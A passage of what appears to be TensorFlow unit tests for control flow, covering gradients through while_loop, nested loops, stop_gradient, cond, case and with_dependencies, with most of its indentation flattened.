rx, ry = control_flow_ops.while_loop(c, b, [x, y], parallel_iterations=1)
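      # Two iterations: ry = (x + 1) * (x + y) = 20 and
      # rx = x * (x + 1) * (x + y)**2 = 300.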
r = gradients_impl.gradients([rx, ry], x)
self.assertAllClose(304.0, r[0])
r = gradients_impl.gradients([rx, ry], y)
self.assertAllClose(124.0, r[0])
r = gradients_impl.gradients([rx], x)
self.assertAllClose(295.0, r[0])
r = gradients_impl.gradients([rx], y)
self.assertAllClose(120.0, r[0])
@test_util.run_deprecated_v1
def testWhileGrad_Dependency(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 10)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
ri, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
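      # Ten doublings give rx = 1024 * x, so drx/dx = 1024 (ri is independent
      # of x).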
r = gradients_impl.gradients([ri, rx], x)
self.assertAllClose(1024.0, r[0])
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0])
@test_util.disable_control_flow_v2("b/116355153 (back_prop flag)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_NoGradient(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], back_prop=False)
r = math_ops.add(r, v)
r = gradients_impl.gradients(r, v)
self.assertAllClose(1.0, r[0])
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_NoDependency(self):
with self.cached_session() as sess:
variable = variables.Variable(array_ops.ones([2, 3]))
duration = array_ops.zeros([], dtype=dtypes.int32)
def cond(duration, tensor, _):
del tensor
return duration < 10
def body(duration, tensor, _):
return (duration + 1, tensor, tensor)
loop_vars = [duration, variable, variable]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[2])
grad = gradients_impl.gradients(cost, [variable])
self.evaluate(variables.global_variables_initializer())
self.assertAllClose(np.ones([2, 3]), sess.run(grad[0]))
@test_util.run_deprecated_v1
def testWhileGrad_Const(self):
with self.cached_session() as sess:
c0 = constant_op.constant(0.0, name="c0")
c1 = constant_op.constant(1.0, name="c1")
duration = constant_op.constant(0, name="t")
def cond(duration, _):
return duration < 1
def body(duration, _):
return duration + 1, c1
loop_vars = [duration, c0]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[1])
grad = gradients_impl.gradients(cost, [c0])
self.assertAllClose(0.0, sess.run(grad[0]))
@test_util.run_v1_only("b/120545219")
def testWhileGrad_SerialTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, rx = control_flow_ops.while_loop(c, b, [i, rx], parallel_iterations=1)
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0])
@test_util.run_v1_only("b/120545219")
def testWhileGrad_ParallelTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, r1 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, r2 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
rx = math_ops.add(r1, r2)
r = gradients_impl.gradients([rx], x)
self.assertAllClose(64.0, r[0])
@test_util.run_v1_only("b/120545219")
def testWhileGrad_OneOutputWithControlDependencyOnSecond(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(1.0, name="y")
c = lambda i, *_: math_ops.less(i, 1, name="cond_less")
def b(i, xi, yi):
# return (i + 1, xi, xi + yi)
return (math_ops.add(i, 1, name="inc"), array_ops.identity(
xi, name="xi"), math_ops.add(xi, yi, name="xi_plus_yi"))
_, x_f, y_f = control_flow_ops.while_loop(c, b, [i, x, y])
with ops.control_dependencies([x_f]):
y_f_d = array_ops.identity(y_f, name="y_f_d")
self.assertAllClose(2.0, self.evaluate(y_f_d)) # y_f_d = 1.0 + 1.0
g = gradients_impl.gradients([y_f_d], [x])[0]
self.assertTrue(g is not None)
self.assertAllClose(1.0,
self.evaluate(g)) # y_f_d = x + 1.0, dy_f_d/dx = 1.0
def _testNestedWhileGrad_Simple(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
c = lambda x: math_ops.less(x, 4.0)
b = lambda x: math_ops.multiply(x, 2.0)
return control_flow_ops.while_loop(c, b, [s])
c = lambda x: math_ops.less(x, 2.0)
b = lambda x: math_ops.multiply(inner_loop(x), 2.0)
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
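      # With v = 1.0 the inner loop doubles twice and the body doubles once
      # more, so r = 8 * v and dr/dv = 8.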
self.assertAllClose(8.0, self.evaluate(r))
@test_util.run_deprecated_v1
def testNestedWhileGrad_Simple(self):
self._testNestedWhileGrad_Simple(use_gpu=False)
self._testNestedWhileGrad_Simple(use_gpu=True)
@test_util.run_v1_only("b/120545219")
def testNestedWhileGrad_SerialInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: inner_loop2(inner_loop1(x)[1])[1]
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
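      # One outer iteration applies two inner factors of 2**4, so r = 256 * v
      # and dr/dv = 256.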
self.assertAllClose(256.0, self.evaluate(r))
@test_util.run_deprecated_v1
def testNestedWhileGrad_ParallelInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: math_ops.multiply(inner_loop1(x)[1], inner_loop2(x)[1])
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
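      # One outer iteration computes (16 * v) * (16 * v) = 256 * v**2, so
      # dr/dv = 512 * v = 512 at v = 1.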
self.assertAllClose(512.0, self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testNestedWhileGrad_ParallelIterations(self):
# Make sure the stack pushes and pops of an inner loop are executed in
# the sequential order of the iterations of its outer loop.
with self.cached_session() as sess:
def inner_loop(t):
fn = lambda n: n + math_ops.square(var)
return functional_ops.map_fn(fn=fn, elems=t, parallel_iterations=10)
def outer_loop(inp):
return functional_ops.map_fn(
fn=inner_loop, elems=inp, parallel_iterations=10)
var = variables.Variable(constant_op.constant(3.0))
inp = constant_op.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
res = outer_loop(inp)
optimizer = adam.AdamOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(math_ops.reduce_mean(math_ops.square(res)))
self.evaluate(variables.global_variables_initializer())
self.evaluate(train_op)
self.assertAllClose(2.999, var.read_value())
def _testWhileCondGrad_Simple(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
v = ops.convert_to_tensor(2.0, name="v")
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(1024.0, self.evaluate(r))
@test_util.disable_control_flow_v2("b/117519152")
@test_util.run_deprecated_v1
def testWhileCondGrad_Simple(self):
self._testWhileCondGrad_Simple(use_gpu=False)
self._testWhileCondGrad_Simple(use_gpu=True)
@test_util.disable_control_flow_v2("b/117276490")
@test_util.run_deprecated_v1
def testWhileCondGrad_UnknownShape(self):
with self.cached_session() as sess:
v = array_ops.placeholder(dtypes.float32)
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
r = sess.run(r, feed_dict={v: 2.0})
self.assertAllClose(1024.0, r)
@test_util.run_deprecated_v1
def testWhileGrad_Concat(self):
with self.cached_session() as sess:
x = variable_scope.get_variable("x", initializer=[[1., 2.]])
i0 = constant_op.constant(0)
h0 = array_ops.zeros([0, 2])
def condition(i, _):
return i < 2
def body(i, h):
return i + 1, array_ops.concat([h, x], 0)
_, h = control_flow_ops.while_loop(
condition, body, [i0, h0],
[i0.get_shape(), tensor_shape.TensorShape([None, 2])])
s = math_ops.reduce_sum(h)
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
op = optimizer.minimize(s)
self.evaluate(variables.global_variables_initializer())
self.evaluate(op)
self.assertAllClose([[0.98000002, 1.98000002]], self.evaluate(x))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileWithRefsWithGradients_1(self):
with self.cached_session() as sess:
x = variables.VariableV1(0.)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 10)
self.assertEqual(x.dtype, dtypes.float32_ref)
def body(i, x):
self.assertEqual(x.dtype, dtypes.float32_ref)
return [i + 1, gen_array_ops.ref_identity(x)]
r = control_flow_ops.while_loop(c, body, [i, x], parallel_iterations=5)
grad_ys = [variables.VariableV1(73)._ref()] # pylint: disable=protected-access
grad = gradients_impl.gradients([r[1]], [x], grad_ys=grad_ys)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.float32_ref)
value_i, value_x, value_x_grad = sess.run(r + grad)
self.assertEqual(10, value_i)
self.assertEqual(0, value_x)
self.assertEqual(73, value_x_grad)
@test_util.disable_control_flow_v2("b/116282023 (IndexedSlices)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_IndexedSlices(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), self.evaluate(r))
@test_util.disable_control_flow_v2("b/116328420 (SparseTensor)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_SparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), self.evaluate(r))
@test_util.disable_control_flow_v2("b/115920078 (gradients)")
@test_util.run_v1_only("b/120545219")
def testCallGradInLoop(self):
with self.cached_session() as sess:
i0 = constant_op.constant(0)
params = constant_op.constant(5.0)
params_1 = math_ops.square(params)
def c(i, _):
return i < 10
def b(i, x):
data = constant_op.constant([1.0, 2.0, 3.0])
data = math_ops.multiply(data, params_1)
x1 = x + gradients_impl.gradients(data, params)[0]
return i + 1, x1
output_grad = control_flow_ops.while_loop(
c, b, [i0, constant_op.constant(0.0)])
self.assertAllClose(600.0, self.evaluate(output_grad)[1])
@test_util.run_deprecated_v1
def testWhileAndTensorArray(self):
with self.cached_session() as sess:
param = constant_op.constant(2.0)
n0 = constant_op.constant(0)
y0 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], name="elems")
def c(i, _):
return i < 10
def b(i, y):
return [
i + 1,
functional_ops.map_fn(lambda x: math_ops.multiply(x, param), y)
]
r = control_flow_ops.while_loop(c, b, [n0, y0], parallel_iterations=1)
r = gradients_impl.gradients(r, param)[0]
self.assertAllClose(107520.0, self.evaluate(r))
@test_util.run_deprecated_v1
def testNestedWhileAndTensorArray(self):
n = constant_op.constant(3.0)
def Body(row, ta, n):
def InnerBody(row, col, ta, n):
# Note: row and col are 1-based.
ta = ta.write(
math_ops.cast(n * (row - 1.) + col - 1., dtypes.int32), row * col)
return row, col + 1., ta, n
      # TODO(b/118457764): Remove n from the loop_vars of both loops once fixed.
ta = control_flow_ops.while_loop(
lambda _, col, _1, n: col <= n,
InnerBody, [row, constant_op.constant(1.), ta, n],
return_same_structure=False)[2]
return row + 1., ta, n
ta = tensor_array_ops.TensorArray(dtype=dtypes.float32, size=9)
ta = control_flow_ops.while_loop(
lambda row, _, _1: row <= n,
Body, [constant_op.constant(1.), ta, n],
return_same_structure=False)[1]
output = array_ops.reshape(ta.stack(), [3, 3])
self.assertAllEqual(
self.evaluate(output), [[1., 2., 3.], [2., 4., 6.], [3., 6., 9.]])
# TODO(b/117675481): This does not work with current TA. Enable with new TA.
# grad = gradients_impl.gradients(output, [n])
# self.assertEqual(self.evaluate(grad), 3.5)
@test_util.run_deprecated_v1
def testWhileGrad_StopGrad(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.square(y)
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y])
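      # Two iterations: ry = y**4 = 16 and rx = (x**2 + y**2)**2 + y**4 = 185.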
r = gradients_impl.gradients(rx, y)[0]
self.assertEqual(136.0, self.evaluate(r))
r = gradients_impl.gradients(ry, y)[0]
self.assertEqual(32.0, self.evaluate(r))
r = gradients_impl.gradients(array_ops.stop_gradient(rx), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(array_ops.stop_gradient(ry), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.square(rx)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), x)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(math_ops.add(rx, ry), y)[0]
self.assertEqual(168.0, self.evaluate(r))
r = gradients_impl.gradients(
math_ops.add(rx, array_ops.stop_gradient(ry)), y)[0]
self.assertEqual(136.0, self.evaluate(r))
r = gradients_impl.gradients(
math_ops.add(array_ops.stop_gradient(rx), ry), y)[0]
self.assertEqual(32.0, self.evaluate(r))
@test_util.run_deprecated_v1
@test_util.disable_control_flow_v2("b/118712257")
def testWhileGrad_StopGradInside(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
self.assertAllClose(0.0, self.evaluate(r))
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose(156.0, self.evaluate(r))
@test_util.run_deprecated_v1
@test_util.disable_control_flow_v2("b/118712257")
def testWhileGrad_StopGradInsideNoShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
y = array_ops.placeholder(dtypes.float32)
c = lambda x, y: math_ops.less(math_ops.reduce_sum(x), 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y, name="stopped"))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
feed_dict = {x: [3.0, 4.0], y: [2.0, 3.0]}
self.assertAllClose([0.0, 0.0], sess.run(r, feed_dict=feed_dict))
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose([156.0, 400.0], sess.run(r, feed_dict=feed_dict))
name = "gradients/while/stopped_grad"
all_ops = x.graph.get_operations()
self.assertFalse(any(name in op.name for op in all_ops))
@test_util.disable_control_flow_v2("b/117954949")
@test_util.run_deprecated_v1
def testWhileGradGradFail(self):
theta = variables.Variable(initial_value=1.)
def fn(prev, x):
return prev + x * theta
result = functional_ops.scan(fn, np.array([1., 2., 3.], dtype=np.float32))
grad_theta = gradients_impl.gradients(result, theta)
if not control_flow_util.ENABLE_CONTROL_FLOW_V2:
with self.assertRaisesRegexp(TypeError, "Second-order gradient"):
gradients_impl.gradients(grad_theta, theta)
grad_theta_stopped = array_ops.stop_gradient(grad_theta)
gradients_impl.gradients(grad_theta_stopped, theta)
@test_util.run_deprecated_v1
def testStopGradOnWhileGrad(self):
with self.cached_session():
x = constant_op.constant(2.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x: math_ops.less(x, 100.0)
b = lambda x: math_ops.multiply(x, y)
rx = control_flow_ops.while_loop(c, b, [x])
rg = gradients_impl.gradients(rx, y)[0]
rg = array_ops.stop_gradient(rg)
r = math_ops.add(math_ops.square(y), rx)
r = math_ops.add(r, rg)
r = gradients_impl.gradients(r, y)[0]
self.assertEqual(388.0, self.evaluate(r))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_deprecated_v1
def testWhileGradientWithNontrainablePath1(self):
q = variables.Variable([7., 8.])
def cond(_, y):
del y
return False
def body(x, _):
return x, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
self.evaluate(q.initializer)
self.assertAllClose([0., 0.], self.evaluate(dy_dq))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileGradientWithNontrainablePath2(self):
q = variables.Variable([7., 8.])
def cond(_, y):
return math_ops.equal(y, 0.)
def body(x, _):
zero = constant_op.constant(0, dtype=dtypes.int64)
return zero, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
self.evaluate(q.initializer)
self.assertAllClose([1., 1.], self.evaluate(dy_dq))
@test_util.disable_control_flow_v2("b/115920078 (gradients)")
@test_util.run_v1_only("b/120545219")
def testIssue16504(self):
c = constant_op.constant(np.arange(100), dtype=dtypes.float32)
w = variables.Variable(
initial_value=np.ones(100), dtype=dtypes.float32) / 100
k = variables.Variable(0, dtype=dtypes.int32)
chg_w = constant_op.constant(np.inf, dtype=dtypes.float32)
def cond(k, _, chg_w):
return math_ops.logical_and(k < 10, chg_w > 1e-3)
def body(k, w, chg_w):
grad, = gradients_impl.gradients(-math_ops.reduce_sum(w * c), w)
w_n = w * math_ops.exp(-0.1 * grad)
w_n /= math_ops.reduce_sum(w_n)
chg_w = (
math_ops.reduce_sum(math_ops.abs(w_n - w)) / math_ops.reduce_sum(
math_ops.abs(w)))
return k + 1, w_n, chg_w
_, w, _ = control_flow_ops.while_loop(cond, body, [k, w, chg_w])
grad, = gradients_impl.gradients(w, c)
self.assertIsNotNone(grad)
@test_util.run_v1_only("b/120545219")
def testStopGradMultiFlows(self):
with self.cached_session():
def body(i, y, r):
x = variable_scope.get_variable(
"x",
shape=(),
dtype=dtypes.float32,
initializer=init_ops.ones_initializer())
y *= x
return [i + 1, y, r + math_ops.reduce_sum(y)]
i0 = constant_op.constant(0)
y0 = array_ops.ones(5)
r0 = constant_op.constant(0.0)
cond = lambda i, y, r: i < 1
_, _, r = control_flow_ops.while_loop(
cond, body, [i0, y0, r0], back_prop=True)
vars_ = variables.global_variables()
grads = linalg_ops.norm(gradients_impl.gradients(r, vars_)[0])
z = math_ops.add(r, array_ops.stop_gradient(math_ops.reduce_sum(grads)))
result = gradients_impl.gradients(z, vars_)[0]
self.evaluate(variables.global_variables_initializer())
self.assertEqual(5.0, self.evaluate(result))
@test_util.run_v1_only("b/120545219")
def testOneValueCond(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
one = ops.convert_to_tensor(1, name="one")
two = ops.convert_to_tensor(2, name="two")
p = math_ops.greater_equal(c, 1)
i = control_flow_ops.cond(p, lambda: one, lambda: two)
self.assertTrue(isinstance(i, ops.Tensor))
# True case: c = 2 is >= 1
self.assertEqual([1], i.eval(feed_dict={c: 2}))
# False case: c = 0 is not >= 1
self.assertEqual([2], i.eval(feed_dict={c: 0}))
@test_util.run_deprecated_v1
def testExampleCond(self):
with self.cached_session():
x = ops.convert_to_tensor([-2.0, 2.0], name="x")
d = array_ops.placeholder(dtypes.int32, shape=[])
def l2():
return math_ops.sqrt(math_ops.reduce_sum(math_ops.square(x)))
def l1():
return math_ops.reduce_sum(math_ops.abs(x))
i = control_flow_ops.cond(math_ops.equal(d, 2), l2, l1)
self.assertAllClose(4.0, i.eval(feed_dict={d: 1}))
self.assertAllClose(2.0 * math.sqrt(2), i.eval(feed_dict={d: 2}))
@test_util.run_v1_only("b/120545219")
def testCase(self):
with self.cached_session():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
{
x < y: f1,
x > z: f2
}, default=f3, exclusive=True)
self.assertAllEqual(r1, 17)
r2 = control_flow_ops.case([(y > z, f1), (y > x, f2)], default=f3)
self.assertAllEqual(r2, 23)
# Duplicate events can happen, first one is selected
r3 = control_flow_ops.case([(x < y, f1), (x < y, f2)], default=f3)
self.assertAllEqual(r3, 17)
# Duplicate events cause an error if exclusive = True
r4 = control_flow_ops.case(
[(x < y, f1), (x < y, f2)], default=f3, exclusive=True)
with self.assertRaisesOpError("Input error:"):
self.evaluate(r4)
# Check that the default is called if none of the others are
r5 = control_flow_ops.case({x > y: f1}, default=f3)
self.assertAllEqual(r5, -1)
ran_once = [False, False, False]
def break_run_twice(ix):
def _break():
ran_once[ix] = True
return constant_op.constant(ix)
return _break
# Should not fail - each conditional gets called exactly once
# except default. Default gets called twice: once to create an
# empty output and once for the actual cond switch.
r6 = control_flow_ops.case(
[(x < y, break_run_twice(0)), (x > y, break_run_twice(1))],
default=lambda: constant_op.constant(2))
self.assertAllEqual(r6, 0)
@test_util.run_v1_only("b/120545219")
def testCaseSideEffects(self):
with self.cached_session() as sess:
v0 = variables.Variable(-1)
v1 = variables.Variable(-1)
v2 = variables.Variable(-1)
a = lambda: control_flow_ops.with_dependencies([state_ops.assign(v0, 0)], 0)
b = lambda: control_flow_ops.with_dependencies([state_ops.assign(v1, 1)], 1)
c = lambda: control_flow_ops.with_dependencies([state_ops.assign(v2, 2)], 2)
x = constant_op.constant(1)
y = constant_op.constant(2)
r0 = control_flow_ops.case(
((x < y, a), (x > y, b)), default=c, exclusive=True)
r1 = control_flow_ops.case(
((x > y, a), (x < y, b)), default=c, exclusive=True)
r2 = control_flow_ops.case(
((x > y, a), (x > y, b)), default=c, exclusive=True)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1] * 3)
self.assertEqual(2, self.evaluate(r2))
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1, -1, 2])
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1] * 3)
self.assertEqual(1, self.evaluate(r1))
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1, 1, -1])
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1] * 3)
self.assertEqual(0, self.evaluate(r0))
self.assertAllEqual(self.evaluate([v0, v1, v2]), [0, -1, -1])
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
@test_util.run_v1_only("b/120545219")
def testOneOpCond(self):
with self.cached_session():
v = variables.Variable(0)
c = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
two = ops.convert_to_tensor(2)
p = math_ops.greater_equal(c, 1)
def a():
return state_ops.assign(v, one)
def b():
return state_ops.assign(v, two)
i = control_flow_ops.cond(p, a, b)
self.assertTrue(isinstance(i, ops.Tensor))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(0, self.evaluate(v))
# True case: c = 2 is >= 1, v is set to 1.
self.assertEqual(1, i.eval(feed_dict={c.name: 2}))
self.assertEqual(1, self.evaluate(v))
# False case: c = 0 is not >= 1, v is set to 2.
self.assertEqual(2, i.eval(feed_dict={c.name: 0}))
self.assertEqual(2, self.evaluate(v))
@test_util.run_v1_only("b/120545219")
def testWithOpsDependencies(self):
with self.cached_session() as sess:
v = variables.VariableV1(0.0)
c = constant_op.constant(10)
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate([c, v])
# Use a control dependency to ensure init_variable is run
# while asking for c
real_v = control_flow_ops.with_dependencies(
name="real_tensor",
output_tensor=v._ref(), # pylint: disable=protected-access
dependencies=[v.initializer])
c_val, real_v_val = self.evaluate([c, real_v])
# Ensure the result of 'real_c' is the same as 'c'
self.assertAllEqual(10, c_val)
# Ensure that 'v' is initialized
self.assertAllClose(0.0, real_v_val)
@test_util.run_v1_only("b/120545219")
def testWithTensorDependencies(self):
with self.cached_session():
v = variables.VariableV1(0.0)
c1 = constant_op.constant(10)
c2 = constant_op.constant(20)
# c1_with_init_v depends on the init op for v
c1_with_init_v = control_flow_ops.with_dependencies(
name="c1_with_init_v", output_tensor=c1, dependencies=[v.initializer])
# c2_with_c1 depends on the value of c1_with_init_v
c2_with_c1_dep = control_flow_ops.with_dependencies(
name="c2_with_c1_dep",
output_tensor=c2,
dependencies=[c1_with_init_v])
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v)
# Get the value of 'c2_with_c1_dep', which should cause 'v'
# to be initialized.
self.assertAllEqual(20, self.evaluate(c2_with_c1_dep))
# Ensure that 'v' is initialized
self.assertAllClose(0.0, self.evaluate(v))
@test_util.run_v1_only("b/120545219")
def testWithIndexedSlicesDependencies(self):
with self.cached_session():
v = variables.VariableV1(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(np.float32))
v_at_1 = ops.IndexedSlices(v, constant_op.constant([1]))
gather_v_at_1 = array_ops.gather(v_at_1.values, v_at_1.indices)
v_at_1_after_init = control_flow_ops.with_dependencies([v.initializer],
v_at_1)
gather_v_at_1_after_init = array_ops.gather(v_at_1_after_init.values,
v_at_1_after_init.indices)
# Fetching gather_v_at_1 will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(gather_v_at_1)
# Getting gather_v_at_1_after_init will work, and initialize v.
self.assertAllEqual([[10.0, 11.0]],
self.evaluate(gather_v_at_1_after_init))
# Double check that 'v' is initialized
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
self.evaluate(v))
def testDependenciesDevice(self):
with ops.Graph().as_default():
# device set on tensor => same device on dep.
with ops.device("/job:ps"):
vd = variables.VariableV1([0.0])
with_vd_dep = control_flow_ops.with_dependencies([vd.initializer], vd)
self.assertTrue("/job:ps" in with_vd_dep.device)
# No device set on tensor => no device on dep.
vnod = variables.VariableV1([0.0])
with_vnod_dep = control_flow_ops.with_dependencies([vnod.initializer],
vnod)
self.assertDeviceEqual(None, with_vnod_dep.device)
# device set on tensor, default device on graph => default device on dep.
vdef = variables.VariableV1([0.0], name="vdef")
with ops.device("/job:worker/device:GPU:1"):
with_vdef_dep = control_flow_ops.with_dependencies([vdef.initializer],
vdef)
# The device is empty, but the colocation constraint is set.
self.assertDeviceEqual("", with_vdef_dep.device)
self.assertEqual([b"loc:@vdef"], with_vdef_dep.op.colocation_groups())
